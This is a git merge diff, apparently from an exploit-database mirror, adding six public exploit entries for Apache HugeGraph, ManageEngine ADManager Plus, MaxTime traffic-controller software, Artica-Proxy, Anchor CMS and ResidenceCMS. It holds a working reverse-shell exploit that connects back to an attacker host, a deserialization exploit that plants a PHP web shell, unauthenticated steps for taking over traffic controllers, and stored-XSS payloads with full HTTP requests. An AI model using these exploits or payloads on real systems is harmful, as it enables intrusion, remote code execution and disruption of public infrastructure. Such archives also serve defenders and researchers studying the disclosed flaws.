Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/java/webapps/52149.py

@@ -0,0 +1,56 @@
+# Exploit Title: Apache HugeGraph < 1.2.0 Remote Code Execution (Unauthenticated)
+# Exploit Author: Yesith Alvarez
+# Vendor Homepage: https://hugegraph.apache.org/docs/download/download/
+# Version: Apache HugeGraph 1.0.0 - 1.2.0
+# CVE : CVE-2024–27348
+
+from requests import Request, Session
+import sys
+import json
+
+def title():
+    print('''
+
+   ______     _______     ____   ___ ____  _  _        ____ _____ _____ _  _    ___
+  / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ \___  |___ /| || |  ( _ )
+ | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ __) | / /  |_ \| || |_ / _ \
+ | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ __/ / /  ___) |__   _| (_) |
+  \____|  \_/  |_____|   |_____|\___/_____|  |_|      |_____/_/  |____/   |_|  \___/
+
+[+] Reverse shell
+Author: Yesith Alvarez
+Github: https://github.com/yealvarez
+Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
+Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024–27348/exploit.py
+    ''')
+
+
+def exploit(url, lhost, lport):
+    payload = {"gremlin": "Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\"bash\", \"-c\", \"bash -i>&/dev/tcp/"+lhost+"/"+lport+"\", \"0>&1\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);", "bindings": {}, "language": "gremlin-groovy", "aliases": {}}
+    headers = {
+    'Content-Type': 'application/json'}
+    s = Session()
+    url = url + "/gremlin"
+    req = Request('POST', url, json=payload, headers=headers)
+    prepped = req.prepare()
+    del prepped.headers['Content-Type']
+    resp = s.send(prepped,
+    verify=False,
+    timeout=15)
+    print(prepped.headers)
+    print(url)
+    print(resp.headers)
+    print(payload)
+    print(resp.status_code)
+    print(resp.text)
+
+
+if __name__ == '__main__':
+    title()
+    if(len(sys.argv) < 4):
+        print('[+] USAGE: python3 %s https://<target_url> lhost lport \n'%(sys.argv[0]))
+        print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.2 4444\n'%(sys.argv[0]))
+        print('[+] Do not forget to run the listener: nc -lvp 4444\n')
+        exit(0)
+    else:
+        exploit(sys.argv[1],sys.argv[2],sys.argv[3])

exploits/multiple/webapps/52148.txt

@@ -0,0 +1,62 @@
+# Exploit Title: ManageEngine ADManager Plus Build < 7210 Elevation of
+Privilege Vulnerability
+# Exploit Author: Metin Yunus Kandemir
+# Vendor Homepage: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/ad-manager/
+# Details: https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409
+# Version: ADManager Plus Build < 7210
+# Tested against: Build 7203
+# CVE: CVE-2024-24409
+
+
+# Description
+The Modify Computers is a predefined role in ADManager for managing
+computers. If a technician user has the Modify Computers privilege
+over a computer can change the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer object. In this
+way, the technician user can set Constrained Kerberos Delegation over
+any computer within the Organizational Unit that the user was
+delegated.
+
+Contrary to what ADManager claims the user who has the Modify
+Computers role can change the privilege of computer objects in the
+Active Directory. The Constrained Kerberos Delegation can be set for
+any service such as CIFS, LDAP, HOST services. Then the user can
+access these services by abusing the Constrained Kerberos Delegation.
+In addition, the Unconstrained Kerberos Delegation can be set over the
+computer objects by changing the userAccountControl attribute.
+Normally, only users that have SeEnableDelegationPrivilege privilege
+can set constrained kerberos delegation. Only members of the
+BUILTIN\Administrators group have this privilege by default. The
+delegated user for an Organizational Unit can not set constrained
+kerberos delegation even if a user has the GenericAll right over a
+computer account, so the delegation process in Active Directory does
+not grant this privilege. However, the technician user can use the
+SeEnableDelegationPrivilege right via the Modify Computers role.
+
+# Vulnerability reasons
+1. ADMP Web App Authorization issue: Assigning a predefined Modify
+Computers role delegates the technician user to modify custom
+attributes of computers unexpectedly. Even though it appears that this
+privilege is not granted in the UI, the Additional Custom Attribute
+property is assigned and this leads to broken access control
+vulnerability.
+
+2. There is no restriction for editing the userAccountControl and
+msDS-AllowedToDelegateTo attributes of the computer objects. The ADMP
+application performs changes with domain admin privileges as designed
+so that if we can bypass some restrictions (e.g. format of attribute
+value), our requests are applied with domain admin privileges. This
+way we can edit the attributes userAccountControl and
+msDS-AllowedToDelegateTo.
+
+# Impact
+A technician user elevates privileges from Domain User to Domain
+Admin. For example, the user can set Constrained Kerberos Delegation
+over CLIENT1$ for the CIFS service of the domain controller and access
+the CIFS service. As a result, the user is delegated to manage
+CLIENT1$ but he can access the CIFS service of the domain controller
+impersonating a user unexpectedly.
+
+# Proof Of Concept
+https://docs.unsafe-inline.com/0day/admanager-plus-build-less-than-7210-elevation-of-privilege-vulnerability-cve-2024-24409

exploits/multiple/webapps/52151.txt

@@ -0,0 +1,24 @@
+# Exploit Title: MaxTime Database Editor 1.9 Authentication Bypass
+# Google Dork: N/A
+# Date: 07/09/2024
+# Exploit Author: Andrew Lemon/Red Threat https://redthreatsec.com
+# Vendor Homepage: https://www.q-free.com
+# Software Link: N/A
+# Version: 1.9
+# Tested on:  (Intelight x-1) Linux 3.14.57
+# CVE : CVE-2024-38944
+
+## Vulnerability Description
+This vulnerability allows remote attackers to bypass authentication on affected installations of MaxTime Database Editor.
+Authentication is not required to exploit this vulnerability.
+
+The specific flaw exists within the web-based UI on Traffic Controllers running version 1.9.x firmware.
+The issue results from the lack of authentication prior to allowing access to functionality.
+An attacker can leverage this vulnerability to gain full control of Intelight Traffic Controllers and modify the configuration of a traffic intersection,
+modify traffic light sequences, or trigger the intersection to go into 4 way flash causing a denial of service and causing traffic congestion.
+
+## Steps to Reproduce
+
+Navigate to the IP address of an identified controller
+When prompted for authentication append /cgi-bin/generateForm.cgi?formID=142 to the end of the IP address
+Under the web security tab change the drop down from enabled to disabled and select apply or take note of the username and password and login with those.

exploits/php/webapps/52146.py

@@ -0,0 +1,78 @@
+# Exploit Title: CVE-2024-2054 Artica-Proxy administrative web
+application insecure deserialization (RCE)
+# Google Dork:
+# Date: 23-04-2024
+# Exploit Author: Madan
+# Vendor Homepage: https://artica-proxy.com/
+# Version: 4.40, 4.50
+# Tested on: [relevant os]
+# CVE : CVE-2024-2054
+
+you can also find the exploit on my github repo:
+https://github.com/Madan301/CVE-2024-2054
+
+
+import requests
+import base64
+import urllib3
+from colorama import Fore
+
+print("Url format Ex: https://8x.3x.xx.xx:9000 the port 9000 might
+sometimes vary from how artica proxy interface is hosted")
+
+URL = input("Enter url: ")
+if URL[-1]=="/":
+    ACTUAL_URL = URL[:-1]
+else:
+    ACTUAL_URL = URL
+
+ARTICA_URL = ACTUAL_URL
+
+def check(ARTICA_URL):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    try:
+        check = requests.get(ARTICA_URL+'/wizard/wiz.upload.php',verify=False)
+    except Exception as e:
+        print(Fore.RED+"Could not reach, check URL")
+    if check.status_code==200:
+        print(Fore.GREEN+"Vulnerable")
+        return True
+    else:
+        print(Fore.RED+"Not Vulnerable")
+
+
+def exploit(ARTICA_URL):
+
+    payload = base64.b64encode(b"<?php system($_GET['cmd']); ?>").decode()
+    payload_data = {
+        "TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI": {
+            "cache_file": "/usr/share/artica-postfix/wizard/wiz.upload.php",
+            "cache_serializer": "json",
+            "cache_size": 999999999,
+            "cache_data": {
+                payload: {
+                    "cache_date": 0,
+                    "ttl": 999999999
+                }
+            }
+        }
+    }
+
+
+    while True:
+        PAYLOAD_CMD = input("enter command: ")
+        url = f"{ARTICA_URL}/wizard/wiz.wizard.progress.php?build-js={payload_data}"
+        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+        response = requests.get(url, verify=False)
+        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+        if response.status_code == 200:
+            cmd_url = f"{ARTICA_URL}/wizard/wiz.upload.php?cmd={PAYLOAD_CMD}"
+            cmd_response = requests.get(cmd_url, verify=False)
+            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+            print(cmd_response.text)
+        else:
+            print("Failed to execute the payload")
+
+check = check(ARTICA_URL=ACTUAL_URL)
+if check==True:
+    exploit(ARTICA_URL=ARTICA_URL)

exploits/php/webapps/52147.NA

@@ -0,0 +1,39 @@
+# Exploit Title: Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)
+# Date: 04/28/2024
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://anchorcms.com/
+# Software Link:
+https://github.com/anchorcms/anchor-cms/archive/refs/tags/0.12.7.zip
+# Version: latest
+# Tested on: MacOS
+
+# Log in to Anchor CMS.
+# Click on "Create New Post".
+# Fill in the "Title" and enter the following payload in the field
+immediately below:
+# "><script>alert()</script>
+# Go to the homepage, and you will see the alert!
+
+
+### PoC Request ###
+
+POST /anchor/admin/posts/edit/2 HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0)
+Gecko/20100101 Firefox/124.0
+Accept: */*
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+X-Requested-With: XMLHttpRequest
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+Origin: http://127.0.0.1
+Connection: close
+Referer: http://127.0.0.1/anchor/admin/posts/edit/2
+Cookie: PHPSESSID=8d8apa3ko6alt5t6jko2e0mrta;
+anchorcms=hlko7b1dbdpjgn58himf2obht5
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+token=OqyPlxKQyav5KQYMbSErNCqjIfCoUGS9GZA3y3ZpnshDgb8IL8vH3kioFIKsO9Kf&title=test&markdown=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&slug=aaaa&created=2024-04-28+12%3A20%3A36&description=&status=published&category=1&css=&js=%22%3E%3Cscript%3Ealert()%3C%2Fscript%3E&autosave=false

exploits/php/webapps/52150.NA

@@ -0,0 +1,69 @@
+# Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting
+via Content Form
+# Date: 8-7-2024
+# Category: Web Application
+# Exploit Author: Jeremia Geraldi Sihombing
+# Version: 2.10.1
+# Tested on: Windows
+# CVE: CVE-2024-39143
+
+Description:
+----------------
+A stored cross-site scripting (XSS) vulnerability exists in
+ResidenceCMS 2.10.1 that allows a low-privilege user to create
+malicious property content with HTML inside it, which acts as a
+stored XSS payload. If this property page is visited by anyone
+including the administrator, then the XSS payload will be triggered..
+
+Steps to reproduce
+-------------------------
+
+1. Login as a low privilege user with property edit capability.
+
+2. Create or Edit one of the user owned property
+(We can user the default property owned by the user).
+3. Fill the content form with XSS payload using the Code View feature.
+Before saving it make sure to go back using the usual view to see if the HTML
+is rendered or not.
+
+Vulnerable parameter name: property[property_description][content]
+
+Example Payload: <img src="x" onerror="alert(document.cookie)">
+
+4. After saving the new property content and clicking the 'Finish Editing',
+go to the page and see the XSS is triggered.
+It is possible to trigger the XSS by using any account or even
+unauthorized account.
+
+Burp Request
+-------------------
+
+POST /en/user/property/7/edit HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0)
+Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1111
+Origin: http://localhost
+Connection: keep-alive
+Referer: http://localhost/en/user/property/7/edit
+Cookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~;
+PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=false
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Priority: u=1
+
+property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished
+renovated 2-bedroom 2-bathroom
+flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished
+renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore
+Blvd, Tampa, FL
+33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img
+src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg